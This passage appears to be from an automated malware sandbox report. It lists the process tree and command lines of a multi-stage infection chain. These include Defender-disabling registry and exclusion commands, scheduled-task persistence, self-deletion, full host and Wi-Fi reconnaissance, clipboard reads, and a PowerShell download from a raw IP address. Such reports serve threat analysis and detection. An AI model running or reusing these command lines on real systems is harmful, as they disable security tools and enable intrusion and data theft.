PID 4628 wrote to memory of 4540 N/A C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4628 wrote to memory of 4540 N/A C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4628 wrote to memory of 4540 N/A C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4628 wrote to memory of 4540 N/A C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4628 wrote to memory of 4540 N/A C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1104 wrote to memory of 4860 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe
PID 1104 wrote to memory of 4860 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe
PID 1104 wrote to memory of 4860 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe
PID 4860 wrote to memory of 4732 N/A C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe C:\Users\Admin\AppData\Local\Temp\1000031001\Newoff.exe
PID 4860 wrote to memory of 4732 N/A C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe C:\Users\Admin\AppData\Local\Temp\1000031001\Newoff.exe
PID 4860 wrote to memory of 4732 N/A C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe C:\Users\Admin\AppData\Local\Temp\1000031001\Newoff.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\ed1a118567f1e5200fc0b4171cb873ec43be8ea212b25e87224769955336aedd.exe

"C:\Users\Admin\AppData\Local\Temp\ed1a118567f1e5200fc0b4171cb873ec43be8ea212b25e87224769955336aedd.exe"

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe

"C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe

"C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"

C:\Users\Admin\1000004002\689e56283d.exe

"C:\Users\Admin\1000004002\689e56283d.exe"

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

"C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe"

C:\Users\Admin\AppData\Local\Temp\1000005001\7a60b7df08.exe

"C:\Users\Admin\AppData\Local\Temp\1000005001\7a60b7df08.exe"

C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe

"C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe

"C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe"

C:\Users\Admin\AppData\Roaming\configurationValue\One.exe

"C:\Users\Admin\AppData\Roaming\configurationValue\One.exe"

C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe

"C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe"

C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe

"C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 1724 -ip 1724

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1724 -s 256

C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe

"C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe

"C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe

"C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" & del "C:\ProgramData\*.dll"" & exit

C:\Users\Admin\AppData\Local\Temp\1000031001\Newoff.exe

"C:\Users\Admin\AppData\Local\Temp\1000031001\Newoff.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4628 -ip 4628

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4628 -s 284

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Newoff.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000031001\Newoff.exe" /F

C:\Windows\SysWOW64\timeout.exe

timeout /t 5

C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 184 -p 2136 -ip 2136

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe

C:\Users\Admin\AppData\Local\Temp\1000031001\Newoff.exe

C:\Users\Admin\AppData\Local\Temp\1000031001\Newoff.exe

C:\Users\Admin\Pictures\OcxPYX4e2zNWsylWKFXgkfzw.exe

"C:\Users\Admin\Pictures\OcxPYX4e2zNWsylWKFXgkfzw.exe" /s

C:\Users\Admin\Pictures\yOIbMyzv9BOumRZmIr0iYxdp.exe

"C:\Users\Admin\Pictures\yOIbMyzv9BOumRZmIr0iYxdp.exe"

C:\Users\Admin\Pictures\LCWsTyLJjSkGmliYSN6Wv7fZ.exe

"C:\Users\Admin\Pictures\LCWsTyLJjSkGmliYSN6Wv7fZ.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"

C:\Users\Admin\Pictures\f9EQ8fOvhyMvnW887Sq3rGDL.exe

"C:\Users\Admin\Pictures\f9EQ8fOvhyMvnW887Sq3rGDL.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"

C:\Users\Admin\Pictures\CpK5B9R53Ie7nM4gl41bNYZz.exe

"C:\Users\Admin\Pictures\CpK5B9R53Ie7nM4gl41bNYZz.exe"

C:\Users\Admin\AppData\Local\Temp\7zSD86E.tmp\Install.exe

.\Install.exe

C:\Users\Admin\AppData\Local\Temp\7zSDAA1.tmp\Install.exe

.\Install.exe /yrVdidRYRgn "385118" /S

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"

C:\Windows\SysWOW64\choice.exe

choice /C Y /N /D Y /T 3

C:\Users\Admin\AppData\Local\Temp\1000038001\buildjudit.exe

"C:\Users\Admin\AppData\Local\Temp\1000038001\buildjudit.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Users\Admin\AppData\Local\Temp\onefile_4444_133616319191786000\stub.exe

"C:\Users\Admin\AppData\Local\Temp\1000038001\buildjudit.exe"

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ver"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe""

C:\Windows\system32\attrib.exe

attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('%error_message%', 0, 'System Error', 0+16);close()""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "chcp"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "chcp"

C:\Windows\system32\chcp.com

chcp

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\chcp.com

chcp

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\system32\HOSTNAME.EXE

hostname

C:\Windows\System32\Wbem\WMIC.exe

wmic logicaldisk get caption,description,providername

C:\Windows\system32\net.exe

net user

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user

C:\Windows\system32\query.exe

query user

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\system32\quser.exe

"C:\Windows\system32\quser.exe"

C:\Windows\system32\net.exe

net localgroup

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup

C:\Windows\system32\net.exe

net localgroup administrators

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup administrators

C:\Windows\system32\net.exe

net user guest

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user guest

C:\Windows\system32\net.exe

net user administrator

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user administrator

C:\Windows\System32\Wbem\WMIC.exe

wmic startup get caption,command

C:\Windows\system32\tasklist.exe

tasklist /svc

C:\Windows\system32\ipconfig.exe

ipconfig /all

C:\Windows\system32\ROUTE.EXE

route print

C:\Windows\system32\ARP.EXE

arp -a

C:\Windows\system32\NETSTAT.EXE

netstat -ano

C:\Windows\system32\sc.exe

sc query type= service state= all

C:\Windows\system32\netsh.exe

netsh firewall show state

C:\Windows\system32\netsh.exe

netsh firewall show config

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "btZaCbGShXZoJDfvCg" /SC once /ST 12:26:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSDAA1.tmp\Install.exe\" PP /YObdidneaD 385118 /S" /V1 /F

C:\Users\Admin\AppData\Local\Temp\1000039001\smartsoftsignew.exe

"C:\Users\Admin\AppData\Local\Temp\1000039001\smartsoftsignew.exe"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn btZaCbGShXZoJDfvCg"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C cd "C:\Users\Admin\AppData\Local\Temp\putty" & "Smartscreen.bat"

C:\Windows\SysWOW64\cmd.exe

/C schtasks /run /I /tn btZaCbGShXZoJDfvCg

\??\c:\windows\SysWOW64\schtasks.exe

schtasks /run /I /tn btZaCbGShXZoJDfvCg

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object Net.WebClient).DownloadFile('http://94.103.188.126/jerry/putty.zip', 'C:\Users\Admin\AppData\Local\Temp\putty.zip')"

C:\Users\Admin\AppData\Local\Temp\7zSDAA1.tmp\Install.exe

C:\Users\Admin\AppData\Local\Temp\7zSDAA1.tmp\Install.exe PP /YObdidneaD 385118 /S

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.com/26uSj6

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffb70af46f8,0x7ffb70af4708,0x7ffb70af4718

C:\Windows\SysWOW64\tar.exe

tar -xf putty.zip

C:\Users\Admin\AppData\Local\Temp\putty\putty.exe

C:\Users\Admin\AppData\Local\Temp\putty\putty.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1932,14479666635586957191,1955158173873551193,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1984 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1932,14479666635586957191,1955158173873551193,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2144 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1932,14479666635586957191,1955158173873551193,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2920 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,14479666635586957191,1955158173873551193,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,14479666635586957191,1955158173873551193,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,14479666635586957191,1955158173873551193,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4612 /prefetch:1

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD 